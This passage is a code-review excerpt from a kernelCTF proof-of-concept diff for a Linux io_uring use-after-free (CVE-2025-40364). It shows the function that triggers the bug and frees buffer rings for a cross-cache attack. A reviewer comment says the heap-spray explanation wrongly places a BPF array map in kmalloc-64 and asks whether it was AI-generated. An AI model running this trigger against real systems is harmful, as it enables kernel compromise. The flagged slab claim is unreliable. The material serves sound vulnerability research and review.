pocs/linux/kernelctf/CVE-2025-40364_lts_cos/exploit/lts-6.6.69/exploit.c

```diff
@@ -0,0 +1,832 @@
+// The vulnerability occurs when `io_uring` prepares an async IO_READV operation
+// with a provided buffer list, but the buffer list is not correctly consumed/committed.
+// This allows the buffer list to be unregistered (freed) prematurely, leading to UAF
+// when the async operation later tries to access the freed memory.
+// Primitive: Use-after-free increment primitive on `io_buffer_list` (kmalloc-64 slab)
+// at offset 22 (corresponding to `bl->head` which is incremented).
+static void vuln_trigger_io_uring_uaf(int uring_fd, int pipe_fd_read,
+                                      unsigned char *sq_ring,
+                                      struct io_uring_sqe *sqes,
+                                      struct io_uring_params *params) {
+    // SQE 0: A dummy read operation to keep the queue busy before trigger UAF at SQE 1, so link with SQE 1
+    sqes[0] = (struct io_uring_sqe){
+        .opcode = IORING_OP_READ,
+        .flags = IOSQE_IO_LINK, // Link with the next SQE
+        .fd = pipe_fd_read,
+        .addr = (size_t)tmp_buf,
+        .len = 1,
+    };
+
+    // SQE 1: The vulnerable IORING_OP_READV operation
+    // IOSQE_BUFFER_SELECT is crucial as it uses the registered buffer ring.
+    // IOSQE_IO_HARDLINK ensures the operation stays pending until explicitly completed.
+    // buf_group is set to a specific ID (0x800) to target a specific `io_buffer_list`.
+    struct iovec iov = {.iov_len = 0x1000};
+    sqes[1] = (struct io_uring_sqe){
+        .opcode = IORING_OP_READV,
+        .flags = IOSQE_FIXED_FILE | IOSQE_BUFFER_SELECT | IOSQE_IO_HARDLINK,
+        .fd = 0, // Using registered fixed dummy file descriptor (not part of the exploit).
+        .addr = (size_t)&iov,
+        .len = 1,
+        .buf_group = 0x800, // This targets the `io_buffer_list` with bgid 0x800
+    };
+
+    // Submit the two SQEs to io_uring
+    ((int *)(sq_ring + params->sq_off.array))[0] = 0; // Index of SQE 0
+    ((int *)(sq_ring + params->sq_off.array))[1] = 1; // Index of SQE 1
+    (*(int *)(sq_ring + params->sq_off.tail)) += 2; // Increment tail to signal new entries
+
+    SYSCHK(syscall(SYS_io_uring_enter, uring_fd, 2, 0, 0, NULL, 0));
+
+    // After submission, the `io_buffer_list` for bgid 0x800 is "prepared" but its
+    // refcount is not incremented. We now unregister (free) a range of these buffers to make it cross cache.
+    // This creates the UAF condition for the `io_buffer_list` at bgid 0x800.
+    for (int i = 0x400; i < 0xc00; i++) { // Range that includes 0x800 
+        struct io_uring_buf_reg unreg_ring = {.bgid = i};
+        SYSCHK(syscall(__NR_io_uring_register, uring_fd, IORING_UNREGISTER_PBUF_RING, &unreg_ring, 1));
+    }
+}
+
+// @step(name="Heap Grooming and Cross-Cache Attack")
+// Sprays BPF array maps to reclaim the memory of the freed `io_buffer_list` objects.
+// This allows the UAF increment to hit a controlled BPF map object.
+// Objects sprayed: BPF array_map (kmalloc-64)
```

Comment:
There is no `array_map` structure in the kernel. `array_map_alloc` seems to be allocate `bpf_array` structure which is at least 384 bytes plus `attr->value_size * attr->max_entries` and `BPF_F_MMAPABLE` makes it allocated as a page not in `kmalloc-64` (writeup also claims a page is allocated).

So this seems to be incorrect information. Is this an AI hallucination?